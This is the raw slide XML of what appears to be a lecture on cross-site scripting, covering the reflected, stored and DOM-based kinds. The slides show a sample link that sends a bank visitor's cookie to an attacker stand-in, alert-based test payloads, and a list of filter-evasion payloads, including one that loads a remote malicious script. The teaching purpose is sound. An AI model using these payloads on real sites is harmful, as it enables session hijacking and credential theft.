            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The JavaScript returned by the web browser is attacker controlled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker just has to trick you to click on a link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The JavaScript code is executed in the context of the web site that returned the error page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is the same origin of the JavaScript code?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The malicious code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can access all the information that a user stored in association with the trusted site </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can access the session token in a cookie and reuse it to login into the same trusted site as the user, provided that the user has a current session with that site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can open a form that appears to be from the trusted site and steal PINs and passwords</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271</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2000351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Steal Login Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="546100"/>
            <a:ext cx="9144000" cy="5749690"/>
            <a:chOff x="0" y="546100"/>
            <a:chExt cx="9144000" cy="5749690"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5" descr="Screen Shot 2015-02-26 at 11.13.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100"/>
              <a:ext cx="9144000" cy="5749690"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6" descr="Screen Shot 2015-02-26 at 11.12.57 AM.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect l="14796" t="3009" b="-2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1621596" y="849373"/>
              <a:ext cx="3428898" cy="153342"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="53628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Reflected Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1160195" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Broken links are a pain and sometimes a site tries to be user-friendly by providing meaningful error messages:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[…]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>404 page does not exist: ~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>vigna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>secrets.html</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker lures the user to visit a page written by the attacker and to follow a link to a sensitive, trusted site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The link is in the form:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>www.usbank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/&lt;script&gt;send-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>CookieTo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>evil@hacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)&lt;/script&gt;"&gt;US Bank&lt;/a&gt; </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273</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32687600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GB"/>
              <a:t>Simple XSS Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1168387" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>There is an XSS vulnerability in the code. The input is not being validated so JavaScript code can be injected into the page!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If we enter the URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>text.pl?msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>=&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>alert(“I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> 0wn you”)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>We can do “anything” we want. E.g., we display a message to the user… worse: we can steal sensitive information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> identifier in JavaScript, we can steal cookies and send them to our server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>We can e-mail this URL to thousands of users and try to trick them into following this link (a reflected XSS attack)</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274</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="205696748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Stored Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1169411" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site scripting can also be performed in a two-step attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First the JavaScript code by the attacker is stored in a database as part of a message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then the victim downloads and executes the code when a page containing the attacker’s input is viewed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Any web site that stores user content, without sanitization, is vulnerable to this attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bulletin board systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blogs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Directories</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275</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12607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9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9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9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9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9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9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9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Executing JavaScript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript can be executed and encoded in many different ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Rsnake’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> "XSS Cheat Sheet" at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simple: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encoded: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%3cscript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=http://www.example.com/malicious-code.js%3e%3c/script%3e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Event handlers: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;body </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=alert('XSS')&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=alert('XSS')&gt;click me!&lt;/b&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>url.to.file.which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>not.exist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=alert('XSS');&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Image tag (with UTF-8 encoding): </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>('XSS')&gt;	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=j&amp;#X41vascript:alert('XSS')&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No quotes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;img%20src=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>x.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>= alert(String(/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>adam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/).substring(1,5) )&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</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276</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="484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DOM-based XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also called third-order XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reflected: first-order</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stored: second-order</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I prefer the term Client-Side XSS </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Because the bug is in the client side (aka JavaScript) code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As opposed to Server-Side XSS vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where the bug is in the server-side code </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11229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XSS Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRP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a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
